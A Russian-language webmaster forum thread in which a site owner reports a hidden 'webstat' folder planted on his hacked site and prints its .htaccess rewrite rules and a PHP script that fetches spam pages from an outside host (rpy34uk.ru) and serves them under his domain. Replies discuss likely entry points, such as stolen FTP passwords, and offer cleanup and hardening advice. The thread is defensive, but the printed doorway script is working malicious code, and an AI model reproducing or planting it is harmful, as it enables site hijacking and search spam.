Перейти к содержимому

Сервис обмена электронных валют

Партнерская программа Kredov

Сторонний каталог на сайте

#1 r0mZet

r0mZet
  • Модератор
  • 966 сообщений
  • Репутация: 107
0

Отправлено 20 Ноябрь 2013 - 09:50

Как то раз захожу в Явебмастер, смотрю у одного сайта проиндексировано 300 страниц, мне показалось это очень странным потому что примерно неделю назад в индексе было около сорока. При этом я точно знаю что новый контент ни кем не добавлялся. Когда открыл "Содержимое сайта" оказалось много левых страниц появилось стеройдов, анаболиков типо как:

http://site.ru/webstat/vyb/skolko-stoit-bmx-v-samare-i-gde-mozhno-kupit.html

Смутил тот факт, что появилась новая директория "webstat". Когда залез на сайт через ФТП, то в этой папке было 2 файла .htaccess и index.php

И так о содержимом в .htaccess:

RewriteEngine On
RewriteBase /webstat
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule index.php.* - [L]
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*) index.php?id=$1

Содержимое index.php:

<?php
if(file_exists('redsed.php'))
{
  include_once 'redsed.php';
}
$id = isset($_GET['id']) ? $_GET['id'] : '';
$url = "http://rpy34uk.ru/$id";
$data = array('terminal' => 'site.ru/webstat');
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$html = curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$type = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
curl_close($ch);
if($code == 404)
{
  header("HTTP/1.0 404 Not Found");
}
header("Content-Type: $type");
echo $html;

Уважаемые участники форума, может ли кто-нибудь сказать о том как мог попасть сторонний каталог и несколько слов об этих файлах в качестве объяснялки как оно все работает. Всем заранее спасибо)

 

 

  • 0

#2 Blogger

Blogger
  • Пользователь
  • 58 сообщений
  • Репутация: 7

Отправлено 20 Ноябрь 2013 - 18:51

Если это Ваш сайт, и Вы не включили его в систему типа Liex для размещения статей, то кто то его просто взломал и использует в своих целях. Кстати папка webstat обычно используется хостером для скрипта анализа типа Awstat
  • 0

#3 Sosnovskij

Sosnovskij
  • Администратор
  • 3 886 сообщений
  • Репутация: 566

Отправлено 21 Ноябрь 2013 - 10:08

папка webstat обычно используется хостером для скрипта анализа типа Awstat

ее, скорее всего, и использовали, потому что она есть практически везде :D
  • 0

Не стесняйтесь ставить оценки темам :) Правила форума. Мой блог http://sosnovskij.ru/.



#4 r0mZet

r0mZet
    Topic Starter
  • Модератор
  • 966 сообщений
  • Репутация: 107

Отправлено 21 Ноябрь 2013 - 11:51

там все эти новые урлы открывают совершенно иной сайт.
Хостер у меня такими вещами не занимался
Сайт не добавлялся в Liex и подобные ему
  • 0

#5 ssabbass

ssabbass
  • Пользователь
  • 280 сообщений
  • Репутация: 33

Отправлено 21 Ноябрь 2013 - 15:35

Тогда Delete (если, конечно, не зарабатываете на продаже ссылок), смена паролей, ограничения доступа для зарегистрированных пользователей, установка лицензионного FTP -сервиса и обновление антивирусной базы.
  • 0

#6 r0mZet

r0mZet
    Topic Starter
  • Модератор
  • 966 сообщений
  • Репутация: 107

Отправлено 21 Ноябрь 2013 - 16:50

Разумеется я это учту, спасибо за совет.
Мне интересно каким методом оно туда попало. РНР-инклудом... или как-то еще =(
признаков шелла я так и не нашел
  • 0

#7 ssabbass

ssabbass
  • Пользователь
  • 280 сообщений
  • Репутация: 33

Отправлено 21 Ноябрь 2013 - 19:20

По разному бывает. Свой движок - свои дырки. А кроме этого, могли вычислить ваш FTP. К примеру, одно время у меня воровал пароли от ФТП мой же Тотал Коммандер, который был скачан неизвестно откуда. После установки лицензии проблема исчезла. Взламывали через форму регистрации или комментарии каким-то образом. Потом ведь куча левых ссылок во всяких плагинах, модулях и др.
  • 0

#8 r0mZet

r0mZet
    Topic Starter
  • Модератор
  • 966 сообщений
  • Репутация: 107

Отправлено 21 Ноябрь 2013 - 19:56

А ведь и правда... про ФТП-клиент я даже и не подумал
  • 0

#9 Blogger

Blogger
  • Пользователь
  • 58 сообщений
  • Репутация: 7

Отправлено 21 Ноябрь 2013 - 19:57

В качестве проги для доступа по FTP рекомендую WinSCP - работает в 3-х режимах - SFTP, SCP и FTP Полностью русифицирован и наиболее безопасен из всех которые я использовал. Главное не сохранять пароли в програме а вводить когда нужно воспользоваться прогой.
  • 1

#10 ssabbass

ssabbass
  • Пользователь
  • 280 сообщений
  • Репутация: 33

Отправлено 21 Ноябрь 2013 - 21:02

Кстати, если уж совсем нужно обезопасить вход по FTP, то на хостинге эту функцию можно периодически отключать. Т.е. вы внесли необходимые коррективы с помощью ФТП, а потом просто закрыли такую возможность через админку хостинга до того раза, когда снова потребуется произвести подключение. Тогда уж никакие взломщики ФТП будут не страшны. А заодно, можно проверить: продолжились взломы или прекратились, чтобы как-то локализовать проблему и выяснить, откуда именно вас взламывают.
  • 1

robot

robot
  • Пользователь PRO
  • 2 652 сообщений
  • Репутация: 85


Оформление форума – IPBSkins.ru